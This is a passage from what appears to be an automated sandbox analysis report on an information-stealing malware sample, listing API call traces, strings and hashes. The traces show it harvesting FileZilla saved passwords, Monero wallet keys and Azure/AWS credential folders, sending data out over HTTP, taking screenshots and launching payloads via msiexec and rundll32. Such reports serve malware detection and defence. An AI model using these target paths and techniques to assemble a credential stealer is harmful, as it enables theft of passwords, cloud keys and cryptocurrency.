                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fbf9be62d381d533e4392b65ccf9c6153d10f1f94ea988021d3afd5816e5a4b7
                  • Instruction ID: 2bf3ecd791c0a2bc2a96f828c43a26ae514c1ab66fd4767559c75d1fb6e0fe5d
                  • Opcode Fuzzy Hash: fbf9be62d381d533e4392b65ccf9c6153d10f1f94ea988021d3afd5816e5a4b7
                  • Instruction Fuzzy Hash: 034128F3E192249FE3155D2CDCC57A7B796DB84324F1A863EDB8497784EC39480542C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 725503db8ad5dbda954da546085e6dd98fc3ca13d4f56d3e6ef8df3191cef82b
                  • Instruction ID: 32ef09a13990c3d7d22bfc66142e19d52bcaf55b0ced99f9ef9f69e10a22ca63
                  • Opcode Fuzzy Hash: 725503db8ad5dbda954da546085e6dd98fc3ca13d4f56d3e6ef8df3191cef82b
                  • Instruction Fuzzy Hash: 424195B29097109FE745AE2ACC4466AF3E6FFC4720F1A882DDAC4C7744DB355841C796
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00B20DBA,00B20DB7,00B20DB6,00B20DB3), ref: 00B10362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B10369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B10385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B103CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B103DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00B10419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B10463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B10562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00B10571
                  • lstrcat.KERNEL32(?,url: ), ref: 00B10580
                  • lstrcat.KERNEL32(?,00000000), ref: 00B10593
                  • lstrcat.KERNEL32(?,00B21678), ref: 00B105A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00B105B5
                  • lstrcat.KERNEL32(?,00B2167C), ref: 00B105C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00B105D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00B105E6
                  • lstrcat.KERNEL32(?,00B21688), ref: 00B105F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00B10604
                  • lstrcat.KERNEL32(?,00000000), ref: 00B10617
                  • lstrcat.KERNEL32(?,00B21698), ref: 00B10626
                  • lstrcat.KERNEL32(?,00B2169C), ref: 00B10635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1068E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B059F8
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B05A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B05B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011FE320,00000000,?,011F9F68,00000000,?,00B21A1C), ref: 00B05E71
                  • lstrlen.KERNEL32(00000000), ref: 00B05E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B05E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B05E9A
                  • lstrlen.KERNEL32(00000000), ref: 00B05EAF
                  • lstrlen.KERNEL32(00000000), ref: 00B05ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B05EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B05F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B05F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B05F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FBD
                  • HttpOpenRequestA.WININET(00000000,011FE310,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B05BF8
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D208
                  • lstrcat.KERNEL32(?,00B21478), ref: 00B0D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D22A
                  • lstrcat.KERNEL32(?,00B2147C), ref: 00B0D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D24C
                  • lstrcat.KERNEL32(?,00B21480), ref: 00B0D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D26E
                  • lstrcat.KERNEL32(?,00B21484), ref: 00B0D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D290
                  • lstrcat.KERNEL32(?,00B21488), ref: 00B0D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D2B2
                  • lstrcat.KERNEL32(?,00B2148C), ref: 00B0D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D2D4
                  • lstrcat.KERNEL32(?,00B21490), ref: 00B0D2E3
                    • Part of subcall function 00B1A820: lstrlen.KERNEL32(00B04F05,?,?,00B04F05,00B20DDE), ref: 00B1A82B
                    • Part of subcall function 00B1A820: lstrcpy.KERNEL32(00B20DDE,00000000), ref: 00B1A885
                  • lstrlen.KERNEL32(?), ref: 00B0D32A
                  • lstrlen.KERNEL32(?), ref: 00B0D339
                    • Part of subcall function 00B1AA70: StrCmpCA.SHLWAPI(011F88D0,00B0A7A7,?,00B0A7A7,011F88D0), ref: 00B1AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011FCD68,00000000,?,00B2144C,00000000,?,?), ref: 00B0CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B0CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B0CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B0CAD9
                  • StrStrA.SHLWAPI(?,011FCD38,00B20B52), ref: 00B0CAF7
                  • StrStrA.SHLWAPI(00000000,011FCB10), ref: 00B0CB1E
                  • StrStrA.SHLWAPI(?,011FD5B8,00000000,?,00B21458,00000000,?,00000000,00000000,?,011F8970,00000000,?,00B21454,00000000,?), ref: 00B0CCA2
                  • StrStrA.SHLWAPI(00000000,011FD618), ref: 00B0CCB9
                    • Part of subcall function 00B0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0C871
                    • Part of subcall function 00B0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0C87C
                  • StrStrA.SHLWAPI(?,011FD618,00000000,?,00B2145C,00000000,?,00000000,011F8980), ref: 00B0CD5A
                  • StrStrA.SHLWAPI(00000000,011F8B40), ref: 00B0CD71
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B46), ref: 00B0C943
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B47), ref: 00B0C957
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B4E), ref: 00B0C978
                  • lstrlen.KERNEL32(00000000), ref: 00B0CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00B0CE9C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • RegOpenKeyExA.ADVAPI32(00000000,011FAEE0,00000000,00020019,00000000,00B205B6), ref: 00B183A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B18426
                  • wsprintfA.USER32 ref: 00B18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18499
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 98c26fb521ea26169731362a9d260122213bc4fe056e4c804d3ee3a5e9eaec7a
                  • Instruction ID: 17690fe71687ca02d6275baa62d918bb4cb244e0817d0534bab51b11251bebd0
                  • Opcode Fuzzy Hash: 98c26fb521ea26169731362a9d260122213bc4fe056e4c804d3ee3a5e9eaec7a
                  • Instruction Fuzzy Hash: 64811871951218ABEB24DF54CD95FEAB7B8FB08710F4082D9E109A6180DF716BC6CFA1
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00B14DCD
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B1492C
                    • Part of subcall function 00B14910: FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00B14E59
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                    • Part of subcall function 00B14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                    • Part of subcall function 00B14910: FindClose.KERNEL32(000000FF), ref: 00B14B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B14EE5
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B149B0
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B208D2), ref: 00B149C5
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B149E2
                    • Part of subcall function 00B14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B14A1E
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,011FE280), ref: 00B14A4A
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,00B20FF8), ref: 00B14A5C
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,?), ref: 00B14A70
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,00B20FFC), ref: 00B14A82
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,?), ref: 00B14A96
                    • Part of subcall function 00B14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B14AAC
                    • Part of subcall function 00B14910: DeleteFileA.KERNEL32(?), ref: 00B14B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: de01544ddf7c3863f9a2481a090df386e9ceccc2f4e53ec0d9b20f24f97808b9
                  • Instruction ID: ddcc82a8d76fcd76676fde6d4cf87b06612e021ebc5821db6d235638f10da17c
                  • Opcode Fuzzy Hash: de01544ddf7c3863f9a2481a090df386e9ceccc2f4e53ec0d9b20f24f97808b9
                  • Instruction Fuzzy Hash: A44195BA94031467DB14F770EC47FEE37B8AB24700F4049D4B249A61C1EEB45BC98BA2
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B1906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: cf9dfe9fadd5b300fc636d9771ba3fbf7a397ac8291131618cb4efda57a135f0
                  • Instruction ID: c07713a9d34b503b5a2829f441b893c689999510ea096bba94c8f71d1cc73342
                  • Opcode Fuzzy Hash: cf9dfe9fadd5b300fc636d9771ba3fbf7a397ac8291131618cb4efda57a135f0
                  • Instruction Fuzzy Hash: 1A71FB75A50208ABDB14DFE8DC99FEEB7B8FB48300F508548F515EB290DB34A945CB61
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B131C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B1335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B134EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 43fe909789b7dc43659caa13511f4b8bf089a42b19b88e114b2236f0a9fca773
                  • Instruction ID: 7bb19d02a20cfde6e71349503514b664f3637a4f450ee8e2f711a5aabe20204f
                  • Opcode Fuzzy Hash: 43fe909789b7dc43659caa13511f4b8bf089a42b19b88e114b2236f0a9fca773
                  • Instruction Fuzzy Hash: 2812FD718111089ADB19FBA0DD92FEEB7B8AF14310F904199E50676191EF347BCACF62
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
